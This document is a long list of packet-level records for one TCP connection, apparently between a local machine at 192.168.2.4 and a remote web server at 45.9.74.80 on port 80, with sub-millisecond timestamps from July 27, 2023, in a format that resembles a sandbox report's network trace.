Jul 27, 2023 20:19:00.438951015 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.438967943 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439029932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439091921 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439152956 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439178944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439233065 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439263105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439327955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439388037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439449072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439475060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439526081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439563036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439625025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439686060 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439744949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439769983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439821959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.439855099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439913988 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.439973116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440042973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440062046 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440104961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440124035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440166950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440210104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440252066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440284967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440311909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440356016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440398932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440443993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440491915 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440509081 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440548897 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440570116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440613985 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440658092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440701008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440718889 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440757990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.440779924 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.440824986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.443160057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.443840027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.443888903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.443933964 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.443979025 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.443999052 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.444052935 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.444354057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.444564104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.444608927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.444678068 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449244976 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449296951 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449340105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449390888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449405909 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449439049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449472904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449517965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449563026 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449587107 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449625015 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449641943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449687004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449728966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449745893 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449790001 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449839115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449860096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449872017 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449897051 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449919939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449944019 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.449954987 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.449980021 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.450040102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.450040102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.452841997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.452872038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.452897072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.452922106 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.452946901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.452990055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.452990055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453020096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453088999 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453119993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453145027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453169107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453197956 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453222990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453233004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453253031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453267097 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453290939 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453315973 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453341961 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453357935 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453368902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453392029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453416109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.453439951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.453449965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.455152035 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464030027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464075089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464099884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464118004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464140892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464157104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464178085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464195967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464212894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464231014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464284897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464315891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464337111 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464359999 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464380980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464401960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464401960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464401960 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464425087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464443922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464462042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464481115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464500904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464500904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464510918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464519024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464536905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464554071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464572906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464582920 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464598894 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464617014 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464636087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464654922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464673996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464693069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464709997 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464729071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464742899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464742899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464742899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464742899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464761972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464777946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464796066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464813948 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.464907885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464907885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464907885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.464939117 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466166019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466188908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466207027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466224909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466243029 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466262102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466295004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.466339111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.466726065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466744900 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466797113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.466824055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472103119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472125053 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472235918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472369909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472389936 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472408056 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472420931 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472459078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472466946 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472484112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472501993 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472520113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472542048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472548962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472568035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472573996 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472600937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472640991 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472657919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472677946 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472697020 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472707033 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472723961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.472747087 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.472779989 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475131989 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475251913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475270033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475287914 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475322008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475523949 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475552082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475569963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475584984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475613117 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475635052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475653887 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475672007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475693941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475699902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475733995 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475817919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475836992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475855112 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475876093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.475883007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.475920916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.476035118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.477768898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.477794886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.477812052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.477875948 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.477901936 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.488836050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.488871098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.488895893 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.488920927 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.488957882 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.488976955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489006996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489033937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489058971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489084959 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489094973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489119053 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489128113 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489151955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489175081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489198923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489211082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489233971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489243984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489268064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489291906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489303112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489326000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489348888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489372969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489383936 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489411116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489417076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489439011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489460945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489484072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489494085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489521027 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489527941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489551067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489573002 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489597082 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489608049 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489634037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489640951 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489662886 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489686012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489710093 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489722013 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489746094 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489756107 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489778042 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489803076 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489835024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489881992 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489906073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489916086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.489939928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489963055 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489986897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.489996910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.490022898 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490030050 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.490052938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490083933 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490103006 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490113020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.490128040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490143061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.490153074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.490180016 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.495857000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.495886087 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.495906115 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.495963097 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.495990038 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496007919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496021986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.496035099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496320963 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496341944 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496360064 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496426105 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496444941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496464968 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496496916 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.496519089 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496527910 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.496546984 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496565104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.496589899 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497395039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497416019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497446060 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497495890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497515917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497534990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497553110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497561932 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497589111 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497678995 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497698069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497715950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497731924 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497741938 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497757912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497797012 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497817039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497833967 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497848988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497875929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:19:00.497935057 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497955084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:19:00.497972965 CEST	80	49693	45.9.74.80	192.168.2.4
